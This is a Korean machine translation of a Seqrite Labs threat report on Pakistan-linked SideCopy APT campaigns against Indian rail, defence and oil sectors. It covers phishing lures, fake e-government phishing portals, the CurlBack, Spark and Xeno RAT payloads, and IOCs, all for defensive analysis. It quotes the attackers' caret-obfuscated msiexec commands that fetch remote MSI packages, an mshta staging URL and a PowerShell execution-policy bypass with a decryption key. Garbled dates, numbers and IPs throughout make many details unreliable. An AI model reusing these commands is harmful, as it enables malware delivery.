Seqrite Labs APT 팀은 2024년 XNUMX월 마지막 주부터 배포된 파키스탄 연계 SideCopy APT의 새로운 전술을 발견했습니다. 이 그룹은 인도 정부, 국방, 해양 부문, 대학생을 넘어 철도, 석유 및 가스, 그리고 외무부 산하 기관까지 공격 대상을 확대했습니다. 최근 공격에서 주목할 만한 변화 중 하나는 HTML 애플리케이션(HTA) 파일에서 Microsoft 설치 프로그램(MSI) 패키지를 주요 스테이징 메커니즘으로 채택한 것입니다.
위협 행위자들은 탐지를 피하기 위해 끊임없이 전략을 발전시키고 있으며, 이러한 변화는 DLL 사이드 로딩과 다중 플랫폼 침입을 지속적으로 사용하는 데 기인합니다. 이러한 발전에는 Xeno RAT 및 Spark RAT와 같은 오픈소스 도구의 반사 로딩 및 용도 변경과 같은 기술도 포함됩니다. 경향 Async RAT를 통해 기능을 확장했습니다. 또한, CurlBack RAT이라는 새로운 페이로드가 발견되었는데, 이는 피해자를 C2 서버에 등록하는 역할을 합니다.
중요한 발견들
- 공격자 이메일 ID와 연결된 사용자 이름은 손상된 ID를 사용하여 사이버 보안 분야 경력이 있는 정부 직원을 사칭하고 있습니다.
- 오픈 디렉토리를 갖춘 전자 정부 서비스를 모방한 가짜 도메인이 페이로드와 자격 증명 피싱 로그인 페이지를 호스팅하는 데 사용됩니다.
- 13개의 하위 도메인과 URL은 마하라슈트라 주에 있는 여러 시 지방 자치 단체(CMC)의 다양한 RTS 서비스에 대한 로그인 페이지를 호스팅합니다.
- 수자원부 산하 국가 수문학 프로젝트(NHP)의 공식 도메인이 손상되어 악성 페이로드가 전달되었습니다.
- PowerShell을 통한 리소스 섹션의 반사적 로딩 및 AES 복호화와 같은 새로운 전략을 사용하여 C# 기반 오픈 소스 도구인 XenoRAT의 사용자 지정 버전을 배포합니다.
- Linux 플랫폼을 타겟으로 하는 Golang 기반 오픈 소스 도구 SparkRAT의 수정된 변형이 동일한 플랫폼을 통해 배포되었습니다. 노련가 이전에는 포세이돈과 아레스 RAT 탑재물에 사용되었습니다.
- DLL 사이드 로딩 기술을 활용하는 CurlBack이라는 새로운 RAT가 사용됩니다. 이 RAT는 UUID를 통해 피해자를 C2 서버에 등록하고 curl을 이용한 파일 전송을 지원합니다.
- 2025년 2024월과 XNUMX년 XNUMX월에 허니트랩을 주제로 한 캠페인이 관찰되었는데, 이는 파키스탄 담당자에게 민감한 데이터를 유출한 혐의로 정부 직원이 체포된 것과 일치했습니다.
- 2024년 2025월에 발견된 교육 포털이 XNUMX년 XNUMX월, 대학생을 대상으로 하는 새로운 URL을 통해 다시 활성화되었습니다. 이 URL들은 "기후 변화", "연구 활동", "전문성"이라는 세 가지 주제를 다룹니다. (전체 분석 내용은 녹화본에서 확인할 수 있습니다.) 여기에서 확인하세요.(SideCopy APT의 6가지 다른 클러스터를 설명합니다.)
- SideCopy의 모체인 APT36은 오랫동안 아프가니스탄 이슬람 에미리트 산하 수감자 관리국(OPA)과 관련된 주제를 다루어 온 끝에 아프가니스탄을 표적으로 삼았습니다. 최근 Linux 시스템을 표적으로 삼은 "미래 전쟁을 위한 리더십 개발"이라는 주제의 캠페인에는 AES/RC4 암호화된 스테이저가 MeshAgent RMM 도구를 사용하는 것이 포함되었습니다.
인도 정부 산하 타깃 부문
- 철도
- 석유 가스
- 외부 업무
- 국방
피싱 이메일
국방 부문을 표적으로 삼은 이 캠페인은 13년 2025월 65일자 "NDC 65 업데이트 일정 논의 중"이라는 제목의 피싱 이메일로 시작되었습니다. 이 이메일에는 표적을 유인하기 위해 "NDCXNUMX-Updated-Schedule.pdf"라는 파일을 다운로드할 수 있는 링크가 포함되어 있습니다.
15년 2025월 XNUMX일에 발송된 두 번째 피싱 이메일에는 "이 과정 정책 업데이트.txt"라는 제목의 피싱 링크가 포함되어 있습니다. 이 이메일은 공식적인 이메일 주소로 보이는 곳에서 발송되었으며, 해킹되었을 가능성이 높습니다. 인도 국방대학(NDC)은 델리에 위치한 국가 안보 전략 및 실무를 교육하는 국방군 훈련 기관으로, 인도 국방부 산하 기관입니다.
공격자의 이메일 주소 "gsosystems-ndc@outlook[.]com"은 10년 2025월 28일 UAE에서 생성되었으며, 마지막으로 활성화된 것은 2025년 XNUMX월 XNUMX일이었습니다. OSINT는 인도 전자정보기술부(MeitY) 산하 국가정보센터(NIC) 소속으로, 유사한 형태의 이메일 주소 "gsosystems.ndc-mod@nic[.]in"을 발견했습니다. 공격자 이메일에 연결된 사용자 이름은 사이버 보안 분야 경력이 있는 정부 관계자를 사칭하고 있습니다.
미끼 문서
이 미끼는 인도 국방대학(NDC)과 관련이 있으며, 2025년 제65기 과정(NDC-65)의 연간 교육 일정(학습 및 활동)을 담고 있습니다. 뉴델리에 위치한 이 미끼는 인도 국방부 산하 국방군(인도군) 및 공무원 장교들을 위한 최고의 전략 교육 기관이자 국방군 훈련 기관입니다.
OpenDir 및 CredPhish
철도 기관을 표적으로 삼는 캠페인을 수행하기 위해 전자정부 포털 서비스를 사칭하는 가짜 도메인이 활용되었습니다. 이 도메인은 16년 2023월 XNUMX일에 생성되었으며, 조사 과정에서 확인된 여러 파일을 호스팅하는 오픈 디렉토리를 포함하고 있습니다.
총 13개의 하위 도메인이 식별되었으며, 다음과 같은 다양한 시스템의 로그인 포털 역할을 합니다.
- 웹메일
- 안전 탱크 관리 시스템
- 급여 시스템
- 권한 설정
이러한 가짜 포털은 작년부터 여러 합법적인 정부 포털을 사칭하여 자격 증명 피싱에 사용되었을 가능성이 높습니다. 이러한 로그인 페이지는 일반적으로 RTS 서비스(공공서비스권법)와 관련이 있으며, 다양한 시·도 지방자치단체(CMC)를 대상으로 합니다. 이러한 가짜 포털은 모두 마하라슈트라 주에 위치한 도시에 속합니다.
- 찬드라 푸르
- Gadchiroli
- 콜라 (Akola)
- 사 타라
- 바사이 비라르
- 발라푸르
- 미라 바인다르
다음 표는 식별된 하위 도메인과 해당 도메인이 처음 관찰된 날짜를 나열합니다.
| 하위 도메인 | 처음 본 |
| gadchiroli.egovservice[.]in | 2024-12-16 |
| pen.egovservice[.]in | 2024-11-27 |
| cpcontacts.egovservice[.]in
cpanel.egovservice[.]in webdisk.egovservice[.]in cpcalendars.egovservice[.]in webmail.egovservice[.]in |
2024-01-03 |
| dss.egovservice[.]in
cmc.egovservice[.]in |
2023-11-03 |
| mail.egovservice[.]in | 2023-10-13 |
| pakola.egovservice[.]in
pakora.egovservice[.]in |
2023-07-23 |
| egovservice[.]in | 2023-06-16 |
이 모든 도메인은 AS 140641(YOTTA NETWORK SERVICES PRIVATE LIMITED)에 따라 다음과 같은 DNS 기록을 보유하고 있습니다. 이는 합법적인 서비스를 사칭하고 의심하지 않는 사용자의 자격 증명을 수집하기 위해 조직적인 인프라가 구축되었을 가능성을 시사합니다.
오픈 디렉토리에 대한 추가 조사 결과, 가짜 도메인과 관련된 추가 URL이 발견되었습니다. 이 URL들은 유사한 피싱 목적에 사용되며 추가적인 미끼 콘텐츠를 호스팅하고 있을 가능성이 높습니다.
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/파코라/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/권한 설정/ |
| hxxps://egovservice.in/130521/13/ |
클러스터-A
SideCopy의 첫 번째 공격 집단은 Windows와 Linux 환경을 동시에 공격하는 정교한 접근 방식을 보여줍니다. 새로운 원격 접속 트로이 목마(RAT)가 추가되어 다양한 시스템을 효과적으로 침해할 수 있는 능력이 강화되었습니다.
Windows
스피어피싱 이메일 링크는 이중 확장자(.pdf.lnk) 바로가기가 포함된 보관 파일을 다운로드합니다. 이 파일은 합법적인 것으로 보이는 도메인에 호스팅됩니다.
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-국경일-RH-PER_N-1/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/보안-지침/ |
단축키 트리거 cmd.exe를 탐지를 피하고 가독성을 떨어뜨리기 위해 이스케이프 문자(^)를 사용하는 인수가 있습니다. 이러한 파일에서는 일반적으로 "desktop-" 접두사가 붙기 때문에 새로운 머신 ID "dv-kevin"이 사용됩니다.
msiexec.exe 유틸리티는 원격으로 호스팅되는 MSI 패키지를 설치하는 데 사용됩니다. 설치 스위치와 함께 자동 모드 플래그를 사용합니다.
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/ |
| C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/ |
첫 번째 도메인은 오픈 디렉토리에서 볼 수 있는 가짜 전자 정부 사이트를 모방하고, 두 번째 도메인은 수자원부 산하 기관인 국가 수문학 프로젝트(National Hydrology Project)에 속한 손상된 도메인입니다. MSI에는 .NET 실행 파일이 포함되어 있습니다. ConsoleApp1.exe base64로 인코딩된 여러 PE 파일을 삭제합니다. 먼저, 미끼 문서가 삭제됩니다. 공공 영역 디렉토리로 이동하고 열면 나머지 PE 파일은 '에 저장됩니다.C:\ProgramData\LavaSoft\'. 그중에는 두 개의 DLL이 있습니다.
- 합법적인 DLL: 샘플오즈.dll
- 악성 DLL: DUI70.dll, 로 식별 컬백 랫.
컬백 랫
서명된 Windows 바이너리 girbesre.exe 원래 이름으로 카메라설정UI호스트.exe DLL 옆에 삭제됩니다. 실행 시 EXE는 악성 DLL을 사이드 로딩합니다. 지속성은 HTA 스크립트(svnides.hta) EXE에 대한 실행 레지스트리 키를 생성합니다. 두 개의 서로 다른 악성 DLL 샘플이 발견되었으며, 컴파일 타임스탬프는 2024년 12월 24일과 2024년 12월 30일입니다.
CurlBack RAT는 처음에 '/antivmcommand' 명령을 사용하여 특정 URL의 응답을 확인합니다. 응답이 "on"이면 계속 진행하고, 그렇지 않으면 자체 종료하여 확인 작업을 유지합니다. 시스템 정보와 연결된 모든 USB 장치를 레지스트리 키를 사용하여 수집합니다.
- “SYSTEM\\ControlSet001\\Enum\\USBSTOR”
연결된 디스플레이와 실행 중인 프로세스가 열거되어 explorer, msedge, chrome, notepad, taskmgr, services, defender, settings에서 확인됩니다.
다음으로, C2 서버에 클라이언트를 등록하기 위한 UUID를 생성합니다. 생성된 ID는 "C:\사용자\ \.클라이언트_id.txt” 사용자 이름과 함께.
ID로 등록하기 전에 "라는 이름의 예약된 작업을 통해 지속성이 설정됩니다.원 드라이브” 합법적인 바이너리에 대해서는 다음 위치에서 확인할 수 있습니다.C:\Windows\System32\작업\OneDrive".
C2 도메인에 추가된 역순 문자열과 그 목적:
| 끈 | 기능 |
| /레치거/ | C2에 클라이언트 등록 |
| /sdnammoc/ | C2에서 명령 가져오기 |
| /태브트라흐/ | C2와의 연결을 정기적으로 확인하세요 |
| /stluser/ | C2에 결과 업로드 |
일단 등록되면, 응답에서 반환된 모든 명령을 검색하기 위해 연결이 유지됩니다.
응답에 값이 포함되어 있으면 현재 타임스탬프를 검색하고 다음 C2 명령 중 하나를 실행합니다.
| Command | 기능 |
| 정보 | 시스템 정보 수집 |
| 다운로드 | 호스트에서 파일 다운로드 |
| 고집 | 지속성 설정 수정 |
| 운영 | 임의의 명령을 실행합니다 |
| 추출물 | 시스템에서 데이터 추출 |
| 허가 | 권한 확인 및 상승 |
| 사용자 | 사용자 계정 열거 |
| cmd를 | 명령줄 작업 실행 |
다른 기본 기능으로는 사용자 및 호스트 정보 가져오기, 아카이브 파일 추출, 작업 생성 등이 있습니다. 문자열과 코드는 악성 DLL 내에 다양한 파일 형식을 열거하고 전송하기 위한 CURL이 존재함을 보여줍니다.
- 이미지 파일: GIF, JPEG, JPG, SVG
- 텍스트 파일: TXT, HTML, PDF, XML
Linux
첫 번째 SideCopy 클러스터는 Windows 중심 공격 외에도 Linux 환경도 노립니다. 악성 아카이브 파일은 Windows 파일과 이름이 같지만 수정 날짜는 2024년 12월 20일입니다. 이 아카이브는 Go 기반 ELF 바이너리를 포함하고 있어 일관된 크로스 플랫폼 전략을 반영합니다. 분석 결과, 스테이저의 함수 흐름은 다음과 유사한 코드를 가집니다. 스테이저 포세이돈과 아레스 RAT와 관련이 있습니다. 이들은 각각 Transparent Tribe와 SideCopy APT와 연결되어 있습니다.
Stager 기능:
- 사용 wget 미끼를 다운로드하는 명령 전자정부서비스 도메인을 대상 디렉토리로 /.local/share 그리고 열어보세요(National-Holidays-RH-PER_N-1.pdf).
- 최종 페이로드 다운로드 꼬마 요정 as /.local/share/xdg-open 그리고 실행합니다.
- 현재 사용자 이름으로 페이로드의 시스템 재부팅을 통한 지속성을 유지하기 위해 '/dev/shm/mycron'이라는 crontab을 만듭니다.
스테이저가 전달하는 최종 페이로드는 Windows, macOS, Linux 시스템을 위한 크로스 플랫폼을 지원하는 오픈소스 원격 액세스 트로이 목마인 Spark RAT입니다. Golang으로 작성되어 2022년 GitHub에 공개된 이 RAT는 500개 이상의 포크(fork)를 통해 큰 인기를 얻고 있습니다. Spark RAT는 웹소켓 프로토콜과 HTTP 요청을 사용하여 C2 서버와 통신합니다.
Spark RAT의 기능으로는 프로세스 관리 및 종료, 네트워크 트래픽 모니터링, 파일 탐색 및 전송, 파일 편집 및 삭제, 코드 강조 표시, 데스크톱 모니터링, 스크린샷 캡처, OS 정보 검색, 원격 터미널 접근 등이 있습니다. 또한, 종료, 재부팅, 로그오프, 절전 모드, 최대 절전 모드, 화면 잠금 기능과 같은 전원 관리 기능을 지원합니다.
클러스터-B
SideCopy의 두 번째 활동은 Windows 시스템을 대상으로 하지만, 2023년 이후 관찰된 인프라를 바탕으로 Linux 시스템을 대상으로 할 것으로 추측됩니다.
감염은 스피어피싱 이메일 링크로 시작되는데, 이 링크는 'NDC65-Updated-Schedule.zip'이라는 이름의 아카이브 파일을 다운로드합니다. 이 파일에는 이중 확장자 형식의 바로가기 파일이 포함되어 있으며, 이 파일은 다른 손상된 도메인에 호스팅된 원격 HTA 파일을 실행합니다.
- “hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe”
LNK "desktop-ey8nc5b"와 연관된 머신 ID는 SideCopy의 이전 캠페인에서도 발견되었지만, 수정 날짜가 '2023:05:26'으로 보아 이전 ID를 재사용하고 있을 가능성이 있습니다. MSI 스테이저와 마찬가지로, 이 그룹은 HTA 기반 스테이저를 계속 활용하고 있는데, 이는 거의 완전히 탐지되지 않은 상태(FUD)입니다.
HTA 파일에는 Base64로 인코딩된 .NET 페이로드가 포함되어 있습니다. BroaderAspect.dll, 디코딩되어 MSHTA의 메모리에 직접 로드됩니다. 이 바이너리는 삭제된 NDC 디코이 문서를 엽니다. 경우 ProgramData 디렉토리 및 PDF로 추가 .NET 스테이저 공공 영역 디렉토리입니다. 지속성은 "Edgre"라는 이름의 Run 레지스트리 키를 통해 설정되며 다음과 같이 실행됩니다.
cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
암호화된 페이로드
'Myapp.pdb'라는 삭제된 .NET 바이너리에는 두 개의 리소스 파일이 있습니다.
- “Myapp.Resources.Document.pdf”
- “Myapp.Properties.Resources.resources”
첫 번째는 다음을 사용하여 디코딩됩니다. 시저 암호 9개의 문자를 뒤로 이동합니다. '로 삭제됩니다.공개\다운로드\문서.pdf' (122.98KB)는 2004년 GIAC 논문 "Windows 운영 체제에서 원격 액세스 트로이 목마의 고급 통신 기술"에 관한 것입니다.
미끼는 아니지만, 암호화된 페이로드가 끝에 첨부됩니다. 맬웨어는 "%%EOF” 마커를 사용하여 PDF 데이터와 EXE 데이터를 구분합니다. PDF 데이터는 처음부터 마커까지 추출되고, EXE 데이터는 마커 이후 6바이트를 건너뛴 후 추출됩니다.
약간의 지연 후 EXE 데이터는 "Public\Downloads\suport.exe”(49.53KB)는 PowerShell 명령을 트리거하는 키와 함께 인수로 전송됩니다.
PowerShell 스테이지
정책 및 프로필을 무시하기 위해 기본 인수 "-NoProfile -ExecutionPolicy Bypass -Command"를 사용하여 PowerShell 명령을 실행하는 모습이 보입니다. 두 개의 매개변수가 전송됩니다.
-EPath 'C:\\Users\\Public\\Downloads\\suport.exe'-EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='
약간의 지연 후, 암호화 키가 Base64에서 디코딩되고, 처음 16바이트는 AES 암호화(PKCS7 패딩을 사용하는 CBC 모드)를 위한 IV로 처리됩니다. 이는 복호화된 바이너리를 .NET 어셈블리 형태로 메모리에 직접 로드하고 해당 진입점을 호출하기 위한 것입니다.
커스텀 제노 랫
'DevApp.exe'라는 최종 .NET 페이로드를 덤프하면 Xeno RAT에서 흔히 볼 수 있는 기능을 볼 수 있습니다. 2023년 말에 처음 발견된 오픈소스 원격 액세스 트로이 목마입니다. 주요 기능으로는 HVNC, 라이브 마이크 액세스, SOCKS5 역방향 프록시, UAC 우회, 키로거 등이 있습니다. SideCopy가 사용하는 사용자 지정 변종에는 C2 및 포트 79.141.161[.]58:1256을 사용하는 기본적인 문자열 조작 방법이 추가되었습니다.
작년에는 UAT-5394로 추적된 북한 관련 APT 공격에 MoonPeak이라는 맞춤형 Xeno RAT 변종이 사용되었습니다. 마찬가지로, DragonSpark와 TAG-100과 같은 중국어권 공격 조직이 맞춤형 Spark RAT 변종을 도입했습니다.
인프라 및 귀속
위협 그룹이 악성코드를 준비하는 데 사용하는 도메인입니다. 대부분 GoDaddy.com, LLC라는 등록기관을 가지고 있습니다.
| 스테이징 도메인 | 처음 본 | 만들어진 | ASN |
| modspaceinterior[.]com | 월 2025 | 9월 2024 | AS 46606 – GoDaddy |
| drjagrutichavan[.]com | 월 2025 | 10월 2021 | AS 394695 – GoDaddy |
| nhp.mowr[.]gov[.]in | 12월 2024 | 2월 2005 | AS 4758 – 국가 정보 센터 |
| egovservice[.]in | 12월 2024 | 2023년 5월 | AS 140641 – GoDaddy |
| pmshriggssssiwan[.]in | 11월 2024 | 월 2024 | AS 47583 – 호스팅어 |
| 교육 포털[.] | 8월 2024 | 8월 2024 | AS 22612 – 네임칩 |
C2 도메인은 2024년 13335월 마지막 주 캠페인 직전에 생성되었습니다. 캐나다 등록 기관인 "인터넷 도메인 서비스 BS Corp."를 통해 캘리포니아에 위치한 Cloudflare ASN XNUMX의 IP로 연결됩니다.
| C2 도메인 | 만들어진 | IP | ASN |
| 업데이트.위젯서비스센터[.]com | 2024년 25월 XNUMX일 | 104.21.15[.]163
172.67.163[.]31
|
ASN 13335 – 클루플레어 |
| 업데이트.biossysinternal[.]com | 2024년 23월 XNUMX일 | 172.67.167[.]230
104.21.13[.]17 |
ASN 202015 – HZ 호스팅 유한회사 |
Xeno RAT 2[.]79.141.161의 C58는 ASN 63의 HZ Hosting Limited와 고유한 일반 이름(CN=PACKERP-8KUN202015U)을 갖습니다. 통신에 사용되는 포트는 1256이지만 열려 있는 RDP 포트 56777도 관찰되었습니다.
두 C2 도메인 모두 Cloudflare ASN 13335와 연결되어 있으며 IP 범위는 172.67.xx.xx입니다. 이 ASN의 유사한 C2 도메인은 이전에 SideCopy가 해당 도메인을 표적으로 삼는 공격에 활용된 적이 있습니다. 바다의 부문. 과거 감염 클러스터, 관찰된 TTP, 그리고 호스팅된 오픈 디렉토리를 고려할 때, 새로운 TTP를 가진 이러한 캠페인은 SideCopy에 기인하는 것으로 높은 신뢰도를 보입니다.
맺음말
파키스탄 연계 APT 그룹인 SideCopy는 2024년 XNUMX월 말 이후 전략을 크게 발전시켜 철도, 석유 및 가스, 외무부 등 주요 부문을 공격 대상으로 확대했습니다. 이 그룹은 HTA 파일에서 MSI 패키지로 전환하여 주요 스테이징 메커니즘을 구축했으며, DLL 사이드 로딩, 반사 로딩, PowerShell을 통한 AES 복호화와 같은 고급 기법을 지속적으로 활용하고 있습니다. 또한, Xeno RAT 및 Spark RAT와 같은 맞춤형 오픈소스 도구를 활용하고 있으며, 새롭게 발견된 CurlBack RAT도 배포하고 있습니다. 감염된 도메인과 가짜 사이트는 자격 증명 피싱 및 페이로드 호스팅에 활용되고 있으며, 이는 이 그룹이 지속성을 강화하고 탐지를 회피하기 위해 지속적으로 노력하고 있음을 보여줍니다.
SEQRITE 보호
- LNK.SideCopy.49245.Gen
- LNK.Trojan.49363.GC
- SideCopy.Mal.49246.GC
- HTA.SideCopy.49248.Gen
- HTA.SideCopy.49247.Gen
- HTA.트로이 목마.49362.GC
- 트로이 목마.Fmq
IOC
Windows
| a5410b76d0cb36786e00d2968d3ab6e4 | 2024-국가공휴일-RH-PER_N-1.zip |
| f404496abccfa93eed5dfda9d8a53dc6 | 2024-국가공휴일-RH-PER_N-1.pdf.lnk |
| 0e57890a3ba16b1ac0117a624f262e61 | 보안 지침.zip |
| 57c2f8b4bbf4037439317a44c2263346 | 보안 지침.pdf.lnk |
| 53eebedc3846b7cf5e29a90a5b96c803 | wininstaller.msi |
| 97c3328427b72f05f120e9a98b6f9b09 | installerr.msi |
| 0690116134586d41a23baed300fc6355 | ConsoleApp1.exe |
| ef40f484e095f0f6f207139cb870a16e | ConsoleApp1.exe |
| 9d189e06d3c4cefdd226e645a0b8bdb9 | DUI70.dll |
| 589a65e0f3fe6777d17d0ac36ab07f6f | DUI70.dll |
| 0eb9e8bec7cc70d603d2d8b6efdd6bb5 | 논의된 대로 NDC 65에 대한 업데이트 일정.txt |
| 8ceeeec0e33026114f028cbb006cb7fc | 이 과정에 대한 정책 업데이트.txt |
| 1d65fa0457a9917809660fff782689fe | NDC65-업데이트-일정.zip |
| 7637cbfa99110fe8e1074e7ead66710e | NDC65-업데이트-일정.pdf.lnk |
| 32a44a8f7b722b078b647e82cb9e85cf | NDC65-업데이트-일정.hta |
| a2dc9654b99f656b4ab30cf5d97fe2e1 | BroaderAspect.dll |
| b45aa156aef2ad2c77b7c623a222f453 | zuidrt.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | 문서.pdf |
| cf6681cf1f765edb6cae81eeed389f78 | 지원.exe |
| c952aca2036d6646c0cffde9e6f22775 | DevApp.exe(사용자 정의 Xeno RAT) |
Linux
| b5e71ff3932c5ef6319b7ca70f7ba8da | 2024-국가공휴일-RH-PER_N-1.zip |
| 0a67bfda993152c93a212087677f9b60 | 2024-국경일-RH-PER_N-1․pdf |
| e165114280204c39e99cf0c650477bf8 | clinsixfer.elf(커스텀 스파크 RAT) |
C2
| 79.141.161[.]58:1256 | 제노 랫 |
| 업데이트.위젯서비스센터[.]com
업데이트.biossysinternal[.]com |
컬백 랫 |
URL이
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-국경일-RH-PER_N-1/ |
| hxxps://egovservice.in/dssrts/helpers/fonts/2024-국경일-RH-PER_N-1/inst/ |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-국경일-RH-PER_N-1/lns/clinsixfer.elf |
| hxxp://egovservice.in/dssrts/helpers/fonts/2024-국가휴가-RH-PER_N-1/lns/2024-국가휴가-RH-PER_N-1.pdf |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/보안-지침/ |
| hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/보안-지침/wont/ |
| hxxps://updates.widgetservicecenter.com/antivmcommand |
| hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-업데이트-스케줄.zip |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/ |
| hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta |
| hxxps://egovservice.in/vvcmcrts/ |
| hxxps://egovservice.in/vvcmc_safety_tank/ |
| hxxps://egovservice.in/testformonline/test_form |
| hxxps://egovservice.in/payroll_vvcmc/ |
| hxxps://egovservice.in/파코라/egovservice.in/ |
| hxxps://egovservice.in/dssrts/ |
| hxxps://egovservice.in/cmc/ |
| hxxps://egovservice.in/vvcmcrtsballarpur72/ |
| hxxps://egovservice.in/dss/ |
| hxxps://egovservice.in/130521/권한 설정/ |
| hxxps://egovservice.in/130521/13/ |
스테이징 도메인
| modspaceinterior[.]com |
| drjagrutichavan[.]com |
| nhp.mowr[.]gov[.]in |
| pmshriggssssiwan[.]in |
| 교육 포털[.] |
| egovservice[.]in |
| gadchiroli.egovservice[.]in
pen.egovservice[.]in cpcontacts.egovservice[.]in cpanel.egovservice[.]in webdisk.egovservice[.]in cpcalendars.egovservice[.]in webmail.egovservice[.]in www.dss.egovservice[.]in www.cmc.egovservice[.]in cmc.egovservice[.]in dss.egovservice[.]in mail.egovservice[.]in www.egovservice[.]in www.pakola.egovservice[.]in pakola.egovservice[.]in www.pakora.egovservice[.]in pakora.egovservice[.]in |
호스트 및 PDB
| C:\ProgramData\LavaSoft\Sampeose.dll |
| C:\ProgramData\LavaSoft\DUI70.dll |
| C:\ProgramData\LavaSoft\girbesre.exe |
| C:\ProgramData\LavaSoft\svnides.hta |
| C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf |
| C:\Users\Public\Downloads\Document.pdf |
| C:\Users\Public\Downloads\suport.exe |
| E:\finalRnd\Myapp\obj\Debug\Myapp.pdb |
미끼
| 320bc4426f4f152d009b6379b5257c78 | 2024-국경일-RH-PER_N-1.pdf |
| 9de50f9357187b623b06fc051e3cac4f | 보안 지침.pdf |
| c9c98cf1624ec4717916414922f196be | NDC65-업데이트-일정.pdf |
| 83ce6ee6ad09a466eb96f347a8b0dc20 | 문서.pdf |
MITER ATT & CK
| TTP | 성함 |
| 정찰 | |
| T1589.002 | 피해자 신원 정보 수집: 이메일 주소 |
| 자원 개발 | |
| T1583.001
T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 T1585.002 T1586.002 |
인프라 획득: 도메인
침해 인프라: 도메인 기능 개발: 맬웨어 기능 획득: 멀웨어 능력 획득: 도구 단계 기능: 맬웨어 업로드 스테이지 기능: 링크 대상 계정 설정: 이메일 계정 해킹 계정: 이메일 계정 |
| 초기 액세스 | |
| T1566.002 | 피싱: 스피어 피싱 링크 |
| 실행 | |
| T1106
T1129 T1059 T1047 T1204.001 T1204.002 |
네이티브 API
공유 모듈 명령 및 스크립팅 해석기 윈도우 관리 계장 사용자 실행: 악성 링크 사용자 실행: 악성 파일 |
| 고집 | |
| T1053.003
T1547.001 |
예약된 작업/작업: Cron
레지스트리 실행 키/시작 폴더 |
| 권한 에스컬레이션 | |
| T1548.002 | 악용 고도 제어 메커니즘: 사용자 계정 제어 우회 |
| 방어 회피 | |
| T1036.005
T1036.007 T1140 T1218.005 T1574.002 T1027 T1620 |
가장 무도회: 적법한 이름 또는 위치 일치
가장: 이중 파일 확장자 파일 또는 정보의 난독화/디코드 시스템 바이너리 프록시 실행: Mshta 하이재킹 실행 흐름: DLL 사이드 로딩 난독화된 파일 또는 정보 반사 코드 로딩 |
| 발견 | |
| T1012
T1016 T1033 T1057 T1082 T1083 T1518.001 |
쿼리 레지스트리
시스템 네트워크 구성 검색 시스템 소유자/사용자 검색 프로세스 발견 시스템 정보 검색 파일 및 디렉토리 검색 소프트웨어 검색: 보안 소프트웨어 검색 |
| 수집 | |
| T1005
T1056.001 T1123 T1113 T1560.001 |
로컬 시스템의 데이터
입력 캡처: 키로깅 오디오 캡처 화면 캡처 수집된 데이터 보관: 유틸리티를 통한 보관 |
| 명령 및 제어 | |
| T1105
T1571 |
인그레스 도구 전송
비표준 포트 |
| 여과 | |
| T1041 | C2 채널을 통한 유출 |
저자 :
사트윅 람 프라키
카르티쿠마르 지바니
